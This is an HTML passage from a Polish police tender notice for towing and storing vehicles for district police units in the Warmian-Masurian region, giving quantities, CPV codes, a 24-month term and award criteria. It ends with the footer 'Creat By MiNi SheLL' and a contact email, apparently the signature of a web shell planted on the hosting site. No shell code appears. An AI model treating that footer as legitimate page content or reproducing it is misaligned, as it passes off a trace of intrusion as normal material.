w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdu powyżej 5 km-14 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdu jednośladowego powyżej 5 km- 	1 szt.
5.Przechowywanie/parkowanie pojazdu1 do 15 dni, stawka za dobę-13 szt.
6.Przechowywanie/parkowanie pojazdu jednośladowego1 do 15 dni, stawka za dobę-	2 szt.
7.Przechowywanie/parkowanie pojazdu1 powyżej 15 dni, stawka za dobę-3 szt.
8.Przechowywanie/parkowanie pojazdu jednośladowego1 powyżej 15 dni, stawka za dobę-	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP w Szczytnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-38 szt.
2.Kompleksowe wykonanie usługi do 5 km od miejsca zabezpieczenia (załadunku) pojazdu jednośladowego do miejsca parkowania, wskazanego przez Policję, 
w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdu powyżej 5 km-33 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdu jednośladowego powyżej 5 km-	2 szt.
5.Przechowywanie/parkowanie pojazdu1 do 15 dni, stawka za dobę-28 szt.
6.Przechowywanie/parkowanie pojazdu jednośladowego1 do 15 dni, stawka za dobę-	2 szt.
7.Przechowywanie/parkowanie pojazdu1 powyżej 15 dni, stawka za dobę -3 szt.
8.Przechowywanie/parkowanie pojazdu jednośladowego1 powyżej 15 dni, stawka za dobę-	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Działdowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt	-3 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3. Stawka za 1 km holowania (przewożenia) pojazdów  o DMC od 3,5 t do 10 t w odległości powyżej 5 km -2 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km -1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę- 2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	2 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę-	2 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń  i rzeczy na potrzeby KMP Elbląg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-3 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km-2 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km-1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę-	2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę -2 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę -2 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Ełk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km -1 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km-1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę-	2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	2 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę-1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Giżycko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km -1 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km -1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę -2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	1 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę -1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę-1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Olecko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km -1 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km-1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę-	2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę-	1 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę -1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń  i rzeczy na potrzeby KPP Ostróda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-3 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km-2 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km-1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę-	2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę  -1 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę-1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę-1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t i ich części składowych 
na potrzeby KP Morąg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
3. Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km-2 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km-1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę -1 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	-1 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę -1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Pisz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
3. Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km -1 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km -1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę 	-2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	-1 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę -1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.00-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KP Orzysz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-1 szt.
3. Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km -2 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km -1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę 	-1 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	1 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę-	1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Świadczenie usług holowania i przewozu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 t oraz ich części składowych, urządzeń i rzeczy na potrzeby KPP Szczytno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-3 szt.
2.Kompleksowe wykonanie usługi holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości do 5 km od miejsca zabezpieczenia (załadunku) pojazdu do miejsca parkowania, wskazanego przez Policję, w tym: użycie sprzętu holującego, użycie sprzętu dodatkowego, dojazd do miejsca zdarzenia, załadunek, wyciąganie z rowu, lasu, rozładunek, przewóz lub holowanie, robociznę i wszelkie inne dodatkowe koszty związane z zabezpieczeniem i załadunkiem pojazdu do holowania - ryczałt-2 szt.
3.Stawka za 1 km holowania (przewożenia) pojazdów o DMC od 3,5 t do 10 t w odległości powyżej 5 km -2 szt.
4.Stawka za 1 km holowania (przewożenia) pojazdów o DMC powyżej 10 t w odległości powyżej 5 km -1 szt.
5.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t do 15 dni, stawka za dobę 	-2 szt.
6.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t do 15 dni, stawka za dobę 	-2 szt.
7.Przechowywanie/parkowanie pojazdu1 o DMC od 3,5 t do 10 t powyżej 15 dni, stawka za dobę 	-1 szt.
8.Przechowywanie/parkowanie pojazdu1 o DMC powyżej 10 t powyżej 15 dni, stawka za dobę -1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 76</li>
<li>2. Odległość parkingu od siedziby danej jednostki Policji - 24</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com